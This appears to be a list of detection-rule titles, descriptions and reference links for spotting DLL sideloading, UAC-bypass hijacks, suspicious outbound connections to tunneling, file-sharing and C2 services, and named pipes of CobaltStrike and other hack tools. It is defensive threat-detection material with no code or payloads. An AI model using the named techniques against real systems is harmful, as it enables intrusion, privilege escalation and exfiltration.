Potential DLL Sideloading Of Non-Existent DLLs From System Folders |
Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories).
Usually this technique is used to achieve UAC bypass or privilege escalation.
|
https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992, https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/, https://github.com/Wh04m1001/SysmonEoP, https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/, http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html |
Microsoft Office DLL Sideload |
Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location |
https://hijacklibs.net/ |
Potential Python DLL SideLoading |
Detects potential DLL sideloading of Python DLL files. |
https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/, https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/, https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python |
Potential Rcdll.DLL Sideloading |
Detects potential DLL sideloading of rcdll.dll |
https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html |
Potential RjvPlatform.DLL Sideloading From Default Location |
Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary, which can be abused as a method of DLL sideloading since the "$SysReset" directory isn't created by default. |
https://twitter.com/0gtweet/status/1666716511988330499 |
Potential RjvPlatform.DLL Sideloading From Non-Default Location |
Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. |
https://twitter.com/0gtweet/status/1666716511988330499 |
Potential RoboForm.DLL Sideloading |
Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager |
https://twitter.com/StopMalvertisin/status/1648604148848549888, https://twitter.com/t3ft3lb/status/1656194831830401024, https://www.roboform.com/ |
Potential ShellDispatch.DLL Sideloading |
Detects potential DLL sideloading of "ShellDispatch.dll" |
https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/ |
DLL Sideloading Of ShellChromeAPI.DLL |
Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary, which in combination with the "PhoneDeepLink" flag tries to load this DLL.
Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter.
|
https://mobile.twitter.com/0gtweet/status/1564131230941122561, https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html |
Potential SmadHook.DLL Sideloading |
Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus |
https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/, https://www.qurium.org/alerts/targeted-malware-against-crph/ |
Potential SolidPDFCreator.DLL Sideloading |
Detects potential DLL sideloading of "SolidPDFCreator.dll" |
https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ |
Third Party Software DLL Sideloading |
Detects DLL sideloading of DLLs that are part of third party software (Zoom, Discord, etc.) |
https://hijacklibs.net/ |
Fax Service DLL Search Order Hijack |
The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. |
https://windows-internals.com/faxing-your-way-to-system/ |
Potential Vivaldi_elf.DLL Sideloading |
Detects potential DLL sideloading of "vivaldi_elf.dll" |
https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ |
VMGuestLib DLL Sideload |
Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service. |
https://decoded.avast.io/martinchlumecky/png-steganography/ |
VMMap Signed Dbghelp.DLL Potential Sideloading |
Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap. |
https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766 |
VMMap Unsigned Dbghelp.DLL Potential Sideloading |
Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap. |
https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766 |
Potential DLL Sideloading Via VMware Xfer |
Detects loading of a DLL by the VMware Xfer utility from a non-default directory, which may be an attempt to sideload an arbitrary DLL |
https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ |
Potential Waveedit.DLL Sideloading |
Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. |
https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html |
Potential Wazuh Security Platform DLL Sideloading |
Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform |
https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html |
Potential Mpclient.DLL Sideloading |
Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool |
Potential WWlib.DLL Sideloading |
Detects potential DLL sideloading of "wwlib.dll" |
https://twitter.com/WhichbufferArda/status/1658829954182774784, https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/, https://securelist.com/apt-luminousmoth/103332/ |
Windows Spooler Service Suspicious Binary Load |
Detects a DLL load from the Spooler Service backup folder |
https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://github.com/ly4k/SpoolFool |
Unsigned Module Loaded by ClickOnce Application |
Detects an unsigned module loaded by a ClickOnce application. |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
DLL Load By System Process From Suspicious Locations |
Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" |
https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea) |
Python Image Load By Non-Python Process |
Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe. |
https://www.py2exe.org/, https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ |
DotNet CLR DLL Loaded By Scripting Applications |
Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. |
https://github.com/tyranid/DotNetToJScript, https://thewover.github.io/Introducing-Donut/, https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html, https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008 |
Unsigned DLL Loaded by Windows Utility |
Detects Windows utilities loading an unsigned or untrusted DLL.
Adversaries often abuse those programs to proxy execution of malicious code.
|
https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion, https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql, https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true |
Suspicious Unsigned Thor Scanner Execution |
Detects loading and execution of an unsigned THOR scanner binary. |
Internal Research |
UAC Bypass Using Iscsicpl - ImageLoad |
Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL search order hijacking technique to load a custom DLL from temp or any user-controlled location in the user's %PATH% |
https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC, https://twitter.com/wdormann/status/1547583317410607110 |
UAC Bypass With Fake DLL |
Detects attempts to load dismcore.dll after dropping it |
https://steemit.com/utopian-io/@ah101/uac-bypassing-utility |
WMIC Loading Scripting Libraries |
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). |
https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html, https://twitter.com/dez_/status/986614411711442944, https://lolbas-project.github.io/lolbas/Binaries/Wmic/ |
Wmiprvse Wbemcomn DLL Hijack |
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html |
WMI Persistence - Command Line Event Consumer |
Detects WMI command line event consumers |
https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
Suspicious WSMAN Provider Image Loads |
Detects signs of potential use of the WSMAN provider from uncommon processes, both locally and for remote execution. |
https://twitter.com/chadtilbury/status/1275851297770610688, https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/, https://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture, https://github.com/bohops/WSMan-WinRM |
Network Connection Initiated By AddinUtil.EXE |
Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
|
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
Uncommon Connection to Active Directory Web Services |
Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
|
https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c, https://github.com/FalconForceTeam/FalconFriday/blob/master/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md |
Uncommon Network Connection Initiated By Certutil.EXE |
Detects a network connection initiated by the certutil.exe utility.
Attackers can abuse the utility in order to download malware or additional payloads.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil |
Outbound Network Connection Initiated By Cmstp.EXE |
Detects a network connection initiated by Cmstp.EXE
It is uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
|
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
Outbound Network Connection Initiated By Microsoft Dialer |
Detects outbound network connection initiated by Microsoft Dialer.
The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
This is an outdated process in the current context of its usage and is a common target for info stealers, which inject into it and use it to make C2 connections; a common example is "Rhadamanthys".
|
https://tria.ge/240301-rk34sagf5x/behavioral2, https://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d, https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/, https://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html |
Network Connection Initiated To AzureWebsites.NET By Non-Browser Process |
Detects a network connection initiated by a non-browser process on the system to "azurewebsites.net". The latter has often been used by threat actors as a malware hosting and exfiltration site.
|
https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/, https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/ |
Network Connection Initiated To BTunnels Domains |
Detects network connections to BTunnels domains initiated by a process on the system.
Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/ |
Network Connection Initiated To Cloudflared Tunnels Domains |
Detects network connections to Cloudflared tunnels domains initiated by a process on the system.
Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, Internal Research |
Network Communication With Crypto Mining Pool |
Detects initiated network connections to crypto mining pools |
https://www.poolwatch.io/coin/monero, https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt, https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files |
New Connection Initiated To Potential Dead Drop Resolver Domain |
Detects an executable, which is not an internet browser or known application, initiating network connections to legitimate popular websites that have been seen used as dead drop resolvers in previous attacks.
In this context attackers leverage well-known websites such as "facebook", "youtube", etc. in order to pass through undetected.
|
https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/, https://securelist.com/the-tetrade-brazilian-banking-malware/97779/, https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html, https://github.com/kleiton0x00/RedditC2, https://twitter.com/kleiton0x7e/status/1600567316810551296, https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al |
Network Connection Initiated To DevTunnels Domain |
Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2, https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security, https://cydefops.com/devtunnels-unleashed |
Suspicious Dropbox API Usage |
Detects an executable that isn't Dropbox but communicates with the Dropbox API |
https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb, https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east |
Suspicious Network Connection to IP Lookup Service APIs |
Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. |
https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a, https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html |
Suspicious Non-Browser Network Communication With Google API |
Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
|
https://github.com/looCiprian/GC2-sheet, https://youtu.be/n2dFlSaBBKo, https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf, https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/, https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/ |
Communication To LocaltoNet Tunneling Service Initiated |
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
|
https://localtonet.com/documents/supported-tunnels, https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications |
Network Connection Initiated To Mega.nz |
Detects a network connection initiated by a binary to "api.mega.co.nz".
Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
|
https://megatools.megous.com/, https://www.mandiant.com/resources/russian-targeting-gov-business |
Process Initiated Network Connection To Ngrok Domain |
Detects an executable initiating a network connection to "ngrok" domains.
Attackers have been seen using "ngrok" in order to store their second stage payloads and malware.
While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.
|
https://ngrok.com/, https://ngrok.com/blog-post/new-ngrok-domains, https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/, https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf |
Communication To Ngrok Tunneling Service Initiated |
Detects an executable initiating a network connection to "ngrok" tunneling domains.
Attackers have been seen using "ngrok" in order to store their second stage payloads and malware.
While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.
|
https://twitter.com/hakluke/status/1587733971814977537/photo/1, https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent |
Potentially Suspicious Network Connection To Notion API |
Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" |
https://github.com/mttaggart/OffensiveNotion, https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332 |
Network Communication Initiated To Portmap.IO Domain |
Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors |
https://portmap.io/, https://github.com/rapid7/metasploit-framework/issues/11337, https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2 |
Suspicious Non-Browser Network Communication With Telegram API |
Detects a non-browser process interacting with the Telegram API, which could indicate use of a covert C2 |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf |
Network Connection Initiated To Visual Studio Code Tunnels Domain |
Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://cydefops.com/vscode-data-exfiltration |
Network Connection Initiated By Eqnedt32.EXE |
Detects network connections from the Equation Editor process "eqnedt32.exe". |
https://twitter.com/forensicitguy/status/1513538712986079238, https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/, https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/ |
Network Connection Initiated By IMEWDBLD.EXE |
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download, https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/ |
Network Connection Initiated Via Notepad.EXE |
Detects a network connection that is initiated by the "notepad.exe" process.
This might be a sign of process injection from a beacon process or something similar.
Notepad rarely initiates a network communication except when printing documents for example.
|
https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf, https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet |
Office Application Initiated Network Connection To Non-Local IP |
Detects an office application (Word, Excel, PowerPoint) that initiates a network connection to a non-private IP address.
This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
This rule will require an initial baseline and tuning that is specific to your organization.
|
https://corelight.com/blog/detecting-cve-2021-42292, https://learn.microsoft.com/de-de/microsoft-365/enterprise/urls-and-ip-address-ranges?view=o365-worldwide |
Office Application Initiated Network Connection Over Uncommon Ports |
Detects an office suite application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports. |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Python Initiated Connection |
Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python, https://pypi.org/project/scapy/ |
Outbound RDP Connections Over Non-Standard Tools |
Detects non-standard tools initiating a connection over port 3389, indicating possible lateral movement.
An initial baseline is required before using this rule in order to exclude third party RDP tooling that you might use.
|
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 |
RDP Over Reverse SSH Tunnel |
Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 |
https://twitter.com/cyb3rops/status/1096842275437625346 |
RDP to HTTP or HTTPS Target Ports |
Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443 |
https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg, https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling |
RegAsm.EXE Initiating Network Connection To Public IP |
Detects "RegAsm.exe" initiating a network connection to public IP addresses |
https://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/, https://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/, https://lolbas-project.github.io/lolbas/Binaries/Regasm/ |
Remote Access Tool - AnyDesk Incoming Connection |
Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows, https://asec.ahnlab.com/en/40263/ |
Silenttrinity Stager Msbuild Activity |
Detects possible remote connections to the Silenttrinity C2 |
https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/ |
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location |
Detects a network connection initiated by programs or processes running from suspicious or uncommon file system locations.
|
https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo |
Network Connection Initiated By Regsvr32.EXE |
Detects a network connection initiated by "Regsvr32.exe" |
https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/, https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ |
Potentially Suspicious Malware Callback Communication |
Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
|
https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo |
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder |
Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains. |
https://twitter.com/M_haggis/status/900741347035889665, https://twitter.com/M_haggis/status/1032799638213066752, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1 |
Microsoft Sync Center Suspicious Network Connections |
Detects suspicious connections from Microsoft Sync Center to non-private IPs. |
https://redcanary.com/blog/intelligence-insights-november-2021/ |
Rundll32 Internet Connection |
Detects a rundll32 that communicates with public IP addresses |
https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100 |
Uncommon Outbound Kerberos Connection |
Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
|
https://github.com/GhostPack/Rubeus |
Potential Remote PowerShell Session Initiated |
Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.
This could potentially indicate a remote PowerShell connection.
|
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Communication To Uncommon Destination Ports |
Detects programs that connect to uncommon destination ports |
https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo |
Outbound Network Connection To Public IP Via Winlogon |
Detects a "winlogon.exe" process that initiates network communications with public IP addresses |
https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ |
Suspicious Outbound SMTP Connections |
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
The data may also be sent to an alternate network location from the main command and control server.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp, https://www.ietf.org/rfc/rfc2821.txt |
CobaltStrike Named Pipe |
Detects the creation of a named pipe as used by CobaltStrike |
https://twitter.com/d4rksystem/status/1357010969264873472, https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/, https://github.com/SigmaHQ/sigma/issues/253, https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/, https://redcanary.com/threat-detection-report/threats/cobalt-strike/ |
Suspicious Network Connection Binary No CommandLine |
Detects suspicious network connections made by a well-known Windows binary run with no command line parameters |
https://redcanary.com/blog/raspberry-robin/ |
ADFS Database Named Pipe Connection By Uncommon Tool |
Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).
This can be used to access information such as the AD FS configuration settings, which contain sensitive information used to sign SAML tokens.
|
https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml, https://o365blog.com/post/adfs/, https://github.com/Azure/SimuLand |
Suspicious Wordpad Outbound Connections |
Detects a network connection initiated by "wordpad.exe" over uncommon destination ports.
This might indicate potential process injection activity from a beacon or similar mechanisms.
|
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
CobaltStrike Named Pipe Pattern Regex |
Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles |
https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575, https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 |
Outbound Network Connection Initiated By Script Interpreter |
Detects a script interpreter (wscript/cscript) opening a network connection to a non-local network. Adversaries may use scripts to download malicious payloads. |
https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md |
Potentially Suspicious Wuauclt Network Connection |
Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and make network connections.
One could easily make the DLL spawn a new process and inject into it to proxy the network connection and bypass this rule.
|
https://dtm.uk/wuauclt/ |
Local Network Connection Initiated By Script Interpreter |
Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
|
https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md |
CobaltStrike Named Pipe Patterns |
Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles |
https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575, https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 |
HackTool - CoercedPotato Named Pipe Creation |
Detects the pattern of a pipe name as used by the hack tool CoercedPotato |
https://blog.hackvens.fr/articles/CoercedPotato.html, https://github.com/hackvens/CoercedPotato |
HackTool - EfsPotato Named Pipe Creation |
Detects the pattern of a pipe name as used by the hack tool EfsPotato |
https://twitter.com/SBousseaden/status/1429530155291193354?s=20, https://github.com/zcgonvh/EfsPotato |
HackTool - DiagTrackEoP Default Named Pipe |
Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege. |
https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22 |
HackTool - Koh Default Named Pipe |
Detects creation of default named pipes used by the Koh tool |
https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12 |
HackTool - Credential Dumping Tools Named Pipe Created |
Detects the execution of well-known credential dumping tools via specific named pipe creation |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799 |
Alternate PowerShell Hosts Pipe |
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html, https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html |
New PowerShell Instance Created |
Detects the execution of PowerShell via the creation of a named pipe starting with PSHost |
https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html, https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html |
PUA - CSExec Default Named Pipe |
Detects default CSExec pipe creation |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://github.com/malcomvetter/CSExec |
PUA - PAExec Default Named Pipe |
Detects PAExec default named pipe |
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md, https://github.com/poweradminllc/PAExec |
PUA - RemCom Default Named Pipe |
Detects default RemCom pipe creation |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://github.com/kavika13/RemCom |
WMI Event Consumer Created Named Pipe |
Detects the WMI Event Consumer service scrcons.exe creating a named pipe |
https://github.com/RiccardoAncarani/LiquidSnake |
Malicious Named Pipe Created |
Detects the creation of a named pipe seen used by known APTs or malware. |
